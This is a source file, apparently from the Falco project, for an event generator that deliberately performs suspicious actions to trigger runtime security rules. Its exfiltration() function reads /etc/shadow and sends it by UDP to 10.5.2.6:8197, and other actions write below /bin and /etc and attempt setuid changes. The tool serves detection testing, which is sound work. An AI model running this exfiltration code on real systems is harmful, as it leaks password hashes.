mirror of
https://github.com/falcosecurity/falco.git
synced 2025-10-22 20:29:39 +00:00
6356490b1c
Small changes to improve the use of falco_event_generator with falco: - In event_generator, some actions like exec_ls won't trigger notifications on their own. So exclude them from -a all. - For all actions, print details on what the action will do. - For actions that won't result in a falco notification in containers, note that in the output. - The short version of --once wasn't working, fix the getopt. - Explicitly saying -a all wasn't working, fix. - Don't rely on an external ruleset in the nodejs docker-compose demo--the built in rules are sufficient now.
517 lines
14 KiB
C++
517 lines
14 KiB
C++
/*
|
|
Copyright (C) 2016 Draios inc.
|
|
|
|
This file is part of falco.
|
|
|
|
falco is free software; you can redistribute it and/or modify
|
|
it under the terms of the GNU General Public License version 2 as
|
|
published by the Free Software Foundation.
|
|
|
|
falco is distributed in the hope that it will be useful,
|
|
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
GNU General Public License for more details.
|
|
|
|
You should have received a copy of the GNU General Public License
|
|
along with falco. If not, see <http://www.gnu.org/licenses/>.
|
|
*/
|
|
|
|
#include <cstdio>
|
|
#include <utility>
|
|
#include <map>
|
|
#include <set>
|
|
#include <string>
|
|
#include <fstream>
|
|
#include <sstream>
|
|
#include <cstring>
|
|
#include <cstdlib>
|
|
#include <unistd.h>
|
|
#include <getopt.h>
|
|
#include <sys/errno.h>
|
|
#include <sys/types.h>
|
|
#include <sys/stat.h>
|
|
#include <sys/wait.h>
|
|
#include <pwd.h>
|
|
#include <sys/socket.h>
|
|
#include <arpa/inet.h>
|
|
|
|
using namespace std;
|
|
|
|
void usage(char *program)
|
|
{
|
|
printf("Usage %s [options]\n\n", program);
|
|
printf("Options:\n");
|
|
printf(" -h/--help: show this help\n");
|
|
printf(" -a/--action: actions to perform. Can be one of the following:\n");
|
|
printf(" write_binary_dir Write to files below /bin\n");
|
|
printf(" write_etc Write to files below /etc\n");
|
|
printf(" read_sensitive_file Read a sensitive file\n");
|
|
printf(" read_sensitive_file_after_startup As a trusted program, wait a while,\n");
|
|
printf(" then read a sensitive file\n");
|
|
printf(" write_rpm_database Write to files below /var/lib/rpm\n");
|
|
printf(" spawn_shell Run a shell (bash)\n");
|
|
printf(" db_program_spawn_process As a database program, try to spawn\n");
|
|
printf(" another program\n");
|
|
printf(" modify_binary_dirs Modify a file below /bin\n");
|
|
printf(" mkdir_binary_dirs Create a directory below /bin\n");
|
|
printf(" change_thread_namespace Change namespace\n");
|
|
printf(" system_user_interactive Change to a system user and try to\n");
|
|
printf(" run an interactive command\n");
|
|
printf(" network_activity Open network connections\n");
|
|
printf(" (used by system_procs_network_activity below)\n");
|
|
printf(" system_procs_network_activity Open network connections as a program\n");
|
|
printf(" that should not perform network actions\n");
|
|
printf(" non_sudo_setuid Setuid as a non-root user\n");
|
|
printf(" create_files_below_dev Create files below /dev\n");
|
|
printf(" exec_ls execve() the program ls\n");
|
|
printf(" (used by user_mgmt_binaries below)\n");
|
|
printf(" user_mgmt_binaries Become the program \"vipw\", which triggers\n");
|
|
printf(" rules related to user management programs\n");
|
|
printf(" exfiltration Read /etc/shadow and send it via udp to a\n");
|
|
printf(" specific address and port\n");
|
|
printf(" all All of the above\n");
|
|
printf(" The action can also be specified via the environment variable EVENT_GENERATOR_ACTIONS\n");
|
|
printf(" as a colon-separated list\n");
|
|
printf(" if specified, -a/--action overrides any environment variables\n");
|
|
printf(" -i/--interval: Number of seconds between actions\n");
|
|
printf(" -o/--once: Perform actions once and exit\n");
|
|
}
|
|
|
|
void open_file(const char *filename, const char *flags)
|
|
{
|
|
FILE *f = fopen(filename, flags);
|
|
if(f)
|
|
{
|
|
fclose(f);
|
|
}
|
|
else
|
|
{
|
|
fprintf(stderr, "Could not open %s for writing: %s\n", filename, strerror(errno));
|
|
}
|
|
|
|
}
|
|
|
|
void exfiltration()
|
|
{
|
|
ifstream shadow;
|
|
|
|
shadow.open("/etc/shadow");
|
|
|
|
printf("Reading /etc/shadow and sending to 10.5.2.6:8197...\n");
|
|
|
|
if(!shadow.is_open())
|
|
{
|
|
fprintf(stderr, "Could not open /etc/shadow for reading: %s", strerror(errno));
|
|
return;
|
|
}
|
|
|
|
string line;
|
|
string shadow_contents;
|
|
while (getline(shadow, line))
|
|
{
|
|
shadow_contents += line;
|
|
shadow_contents += "\n";
|
|
}
|
|
|
|
int rc;
|
|
ssize_t sent;
|
|
int sock = socket(PF_INET, SOCK_DGRAM, 0);
|
|
struct sockaddr_in dest;
|
|
|
|
dest.sin_family = AF_INET;
|
|
dest.sin_port = htons(8197);
|
|
inet_aton("10.5.2.6", &(dest.sin_addr));
|
|
|
|
if((rc = connect(sock, (struct sockaddr *) &dest, sizeof(dest))) != 0)
|
|
{
|
|
fprintf(stderr, "Could not bind listening socket to dest: %s\n", strerror(errno));
|
|
return;
|
|
}
|
|
|
|
if ((sent = send(sock, shadow_contents.c_str(), shadow_contents.size(), 0)) != shadow_contents.size())
|
|
{
|
|
fprintf(stderr, "Could not send shadow contents via udp datagram: %s\n", strerror(errno));
|
|
return;
|
|
}
|
|
|
|
close(sock);
|
|
}
|
|
|
|
void touch(const char *filename)
|
|
{
|
|
open_file(filename, "w");
|
|
}
|
|
|
|
void read(const char *filename)
|
|
{
|
|
open_file(filename, "r");
|
|
}
|
|
|
|
uid_t become_user(const char *user)
|
|
{
|
|
struct passwd *pw;
|
|
pw = getpwnam(user);
|
|
if(pw == NULL)
|
|
{
|
|
fprintf(stderr, "Could not find user information for \"%s\" user: %s\n", user, strerror(errno));
|
|
exit(1);
|
|
}
|
|
|
|
int rc = setuid(pw->pw_uid);
|
|
|
|
if(rc != 0)
|
|
{
|
|
fprintf(stderr, "Could not change user to \"%s\" (uid %u): %s\n", user, pw->pw_uid, strerror(errno));
|
|
exit(1);
|
|
}
|
|
}
|
|
|
|
void spawn(const char *cmd, char **argv, char **env)
|
|
{
|
|
pid_t child;
|
|
|
|
// Fork a process, that way proc.duration is reset
|
|
if ((child = fork()) == 0)
|
|
{
|
|
execve(cmd, argv, env);
|
|
fprintf(stderr, "Could not exec to spawn %s: %s\n", cmd, strerror(errno));
|
|
}
|
|
else
|
|
{
|
|
int status;
|
|
waitpid(child, &status, 0);
|
|
}
|
|
}
|
|
|
|
void respawn(const char *cmd, const char *action, const char *interval)
|
|
{
|
|
char *argv[] = {(char *) cmd,
|
|
(char *) "--action", (char *) action,
|
|
(char *) "--interval", (char *) interval,
|
|
(char *) "--once", NULL};
|
|
|
|
char *env[] = {NULL};
|
|
|
|
spawn(cmd, argv, env);
|
|
}
|
|
|
|
void write_binary_dir() {
|
|
printf("Writing to /bin/created-by-event-generator-sh...\n");
|
|
touch("/bin/created-by-event-generator-sh");
|
|
}
|
|
|
|
void write_etc() {
|
|
printf("Writing to /etc/created-by-event-generator-sh...\n");
|
|
touch("/etc/created-by-event-generator-sh");
|
|
}
|
|
|
|
void read_sensitive_file() {
|
|
printf("Reading /etc/shadow...\n");
|
|
read("/etc/shadow");
|
|
}
|
|
|
|
void read_sensitive_file_after_startup() {
|
|
printf("Becoming the program \"httpd\", sleeping 6 seconds and reading /etc/shadow...\n");
|
|
respawn("./httpd", "read_sensitive_file", "6");
|
|
}
|
|
|
|
void write_rpm_database() {
|
|
printf("Writing to /var/lib/rpm/created-by-event-generator-sh...\n");
|
|
touch("/var/lib/rpm/created-by-event-generator-sh");
|
|
}
|
|
|
|
void spawn_shell() {
|
|
printf("Spawning a shell to run \"ls > /dev/null\" using system()...\n");
|
|
int rc;
|
|
|
|
if ((rc = system("ls > /dev/null")) != 0)
|
|
{
|
|
fprintf(stderr, "Could not run ls > /dev/null in a shell: %s\n", strerror(errno));
|
|
}
|
|
}
|
|
|
|
void db_program_spawn_process() {
|
|
printf("Becoming the program \"mysql\" and then spawning a shell\n");
|
|
respawn("./mysqld", "spawn_shell", "0");
|
|
}
|
|
|
|
void modify_binary_dirs() {
|
|
printf("Moving /bin/true to /bin/true.event-generator-sh and back...\n");
|
|
|
|
if (rename("/bin/true", "/bin/true.event-generator-sh") != 0)
|
|
{
|
|
fprintf(stderr, "Could not rename \"/bin/true\" to \"/bin/true.event-generator-sh\": %s\n", strerror(errno));
|
|
}
|
|
else
|
|
{
|
|
if (rename("/bin/true.event-generator-sh", "/bin/true") != 0)
|
|
{
|
|
fprintf(stderr, "Could not rename \"/bin/true.event-generator-sh\" to \"/bin/true\": %s\n", strerror(errno));
|
|
}
|
|
}
|
|
}
|
|
|
|
void mkdir_binary_dirs() {
|
|
printf("Creating directory /bin/directory-created-by-event-generator-sh...\n");
|
|
if (mkdir("/bin/directory-created-by-event-generator-sh", 0644) != 0)
|
|
{
|
|
fprintf(stderr, "Could not create directory \"/bin/directory-created-by-event-generator-sh\": %s\n", strerror(errno));
|
|
}
|
|
}
|
|
|
|
void change_thread_namespace() {
|
|
printf("Calling setns() to change namespaces...\n");
|
|
printf("NOTE: does not result in a falco notification in containers, unless container run with --privileged or --security-opt seccomp=unconfined\n");
|
|
// It doesn't matter that the arguments to setns are
|
|
// bogus. It's the attempt to call it that will trigger the
|
|
// rule.
|
|
setns(0, 0);
|
|
}
|
|
|
|
void system_user_interactive() {
|
|
pid_t child;
|
|
|
|
printf("Forking a child that becomes user=daemon and then tries to run /bin/login...\n");
|
|
// Fork a child and do everything in the child.
|
|
if ((child = fork()) == 0)
|
|
{
|
|
become_user("daemon");
|
|
char *argv[] = {(char *)"/bin/login", NULL};
|
|
char *env[] = {NULL};
|
|
spawn("/bin/login", argv, env);
|
|
exit(0);
|
|
}
|
|
else
|
|
{
|
|
int status;
|
|
waitpid(child, &status, 0);
|
|
}
|
|
}
|
|
|
|
void network_activity() {
|
|
printf("Opening a listening socket on port 8192...\n");
|
|
int rc;
|
|
int sock = socket(PF_INET, SOCK_DGRAM, 0);
|
|
struct sockaddr_in localhost;
|
|
|
|
localhost.sin_family = AF_INET;
|
|
localhost.sin_port = htons(8192);
|
|
inet_aton("127.0.0.1", &(localhost.sin_addr));
|
|
|
|
if((rc = bind(sock, (struct sockaddr *) &localhost, sizeof(localhost))) != 0)
|
|
{
|
|
fprintf(stderr, "Could not bind listening socket to localhost: %s\n", strerror(errno));
|
|
return;
|
|
}
|
|
|
|
listen(sock, 1);
|
|
|
|
close(sock);
|
|
}
|
|
|
|
void system_procs_network_activity() {
|
|
printf("Becoming the program \"sha1sum\" and then performing network activity\n");
|
|
respawn("./sha1sum", "network_activity", "0");
|
|
}
|
|
|
|
void non_sudo_setuid() {
|
|
pid_t child;
|
|
|
|
printf("Forking a child that becomes \"daemon\" user and then \"root\"...\n");
|
|
|
|
// Fork a child and do everything in the child.
|
|
if ((child = fork()) == 0)
|
|
{
|
|
// First setuid to something non-root. Then try to setuid back to root.
|
|
become_user("daemon");
|
|
become_user("root");
|
|
exit(0);
|
|
}
|
|
else
|
|
{
|
|
int status;
|
|
waitpid(child, &status, 0);
|
|
}
|
|
}
|
|
|
|
void create_files_below_dev() {
|
|
printf("Creating /dev/created-by-event-generator-sh...\n");
|
|
touch("/dev/created-by-event-generator-sh");
|
|
}
|
|
|
|
void exec_ls()
|
|
{
|
|
char *argv[] = {(char *)"/bin/ls", NULL};
|
|
char *env[] = {NULL};
|
|
spawn("/bin/ls", argv, env);
|
|
}
|
|
|
|
void user_mgmt_binaries() {
|
|
printf("Becoming the program \"vipw\" and then running the program /bin/ls\n");
|
|
printf("NOTE: does not result in a falco notification in containers\n");
|
|
respawn("./vipw", "exec_ls", "0");
|
|
}
|
|
|
|
typedef void (*action_t)();
|
|
|
|
map<string, action_t> defined_actions = {{"write_binary_dir", write_binary_dir},
|
|
{"write_etc", write_etc},
|
|
{"read_sensitive_file", read_sensitive_file},
|
|
{"read_sensitive_file_after_startup", read_sensitive_file_after_startup},
|
|
{"write_rpm_database", write_rpm_database},
|
|
{"spawn_shell", spawn_shell},
|
|
{"db_program_spawn_process", db_program_spawn_process},
|
|
{"modify_binary_dirs", modify_binary_dirs},
|
|
{"mkdir_binary_dirs", mkdir_binary_dirs},
|
|
{"change_thread_namespace", change_thread_namespace},
|
|
{"system_user_interactive", system_user_interactive},
|
|
{"network_activity", network_activity},
|
|
{"system_procs_network_activity", system_procs_network_activity},
|
|
{"non_sudo_setuid", non_sudo_setuid},
|
|
{"create_files_below_dev", create_files_below_dev},
|
|
{"exec_ls", exec_ls},
|
|
{"user_mgmt_binaries", user_mgmt_binaries},
|
|
{"exfiltration", exfiltration}};
|
|
|
|
// Some actions don't directly result in suspicious behavior. These
|
|
// actions are excluded from the ones run with -a all.
|
|
set<string> exclude_from_all_actions = {"exec_ls", "network_activity"};
|
|
|
|
void create_symlinks(const char *program)
|
|
{
|
|
int rc;
|
|
|
|
// Some actions depend on this program being re-run as
|
|
// different program names like 'mysqld', 'httpd', etc. This
|
|
// sets up all the required symlinks.
|
|
const char *progs[] = {"./httpd", "./mysqld", "./sha1sum", "./vipw", NULL};
|
|
|
|
for (unsigned int i=0; progs[i] != NULL; i++)
|
|
{
|
|
unlink(progs[i]);
|
|
|
|
if ((rc = symlink(program, progs[i])) != 0)
|
|
{
|
|
fprintf(stderr, "Could not link \"./event_generator\" to \"%s\": %s\n", progs[i], strerror(errno));
|
|
}
|
|
}
|
|
}
|
|
|
|
void run_actions(map<string, action_t> &actions, int interval, bool once)
|
|
{
|
|
while (true)
|
|
{
|
|
for (auto action : actions)
|
|
{
|
|
printf("***Action %s\n", action.first.c_str());
|
|
action.second();
|
|
sleep(interval);
|
|
}
|
|
if(once)
|
|
{
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
map<string, action_t> actions;
|
|
int op;
|
|
int long_index = 0;
|
|
int interval = 1;
|
|
bool once = false;
|
|
map<string, action_t>::iterator it;
|
|
|
|
static struct option long_options[] =
|
|
{
|
|
{"help", no_argument, 0, 'h' },
|
|
{"action", required_argument, 0, 'a' },
|
|
{"interval", required_argument, 0, 'i' },
|
|
{"once", no_argument, 0, 'o' },
|
|
|
|
{0, 0}
|
|
};
|
|
|
|
//
|
|
// Parse the args
|
|
//
|
|
while((op = getopt_long(argc, argv,
|
|
"ha:i:l:o",
|
|
long_options, &long_index)) != -1)
|
|
{
|
|
switch(op)
|
|
{
|
|
case 'h':
|
|
usage(argv[0]);
|
|
exit(1);
|
|
case 'a':
|
|
// "all" is already implied
|
|
if (strcmp(optarg, "all") != 0)
|
|
{
|
|
if((it = defined_actions.find(optarg)) == defined_actions.end())
|
|
{
|
|
fprintf(stderr, "No action with name \"%s\" known, exiting.\n", optarg);
|
|
exit(1);
|
|
}
|
|
actions.insert(*it);
|
|
}
|
|
break;
|
|
case 'i':
|
|
interval = atoi(optarg);
|
|
break;
|
|
case 'o':
|
|
once = true;
|
|
break;
|
|
default:
|
|
usage(argv[0]);
|
|
exit(1);
|
|
}
|
|
}
|
|
|
|
//
|
|
// Also look for actions in the environment. If specified, they
|
|
// override any specified on the command line.
|
|
//
|
|
char *env_action = getenv("EVENT_GENERATOR_ACTIONS");
|
|
|
|
if(env_action)
|
|
{
|
|
actions.clear();
|
|
|
|
string envs(env_action);
|
|
istringstream ss(envs);
|
|
string item;
|
|
while (std::getline(ss, item, ':'))
|
|
{
|
|
if((it = defined_actions.find(item)) == defined_actions.end())
|
|
{
|
|
fprintf(stderr, "No action with name \"%s\" known, exiting.\n", item.c_str());
|
|
exit(1);
|
|
}
|
|
actions.insert(*it);
|
|
}
|
|
}
|
|
|
|
if(actions.size() == 0)
|
|
{
|
|
for(auto &act : defined_actions)
|
|
{
|
|
if(exclude_from_all_actions.find(act.first) == exclude_from_all_actions.end())
|
|
{
|
|
actions.insert(act);
|
|
}
|
|
}
|
|
}
|
|
|
|
setvbuf(stdout, NULL, _IONBF, 0);
|
|
setvbuf(stderr, NULL, _IONBF, 0);
|
|
// Only create symlinks when running as the program event_generator
|
|
if (strstr(argv[0], "generator"))
|
|
{
|
|
create_symlinks(argv[0]);
|
|
}
|
|
|
|
run_actions(actions, interval, once);
|
|
}
|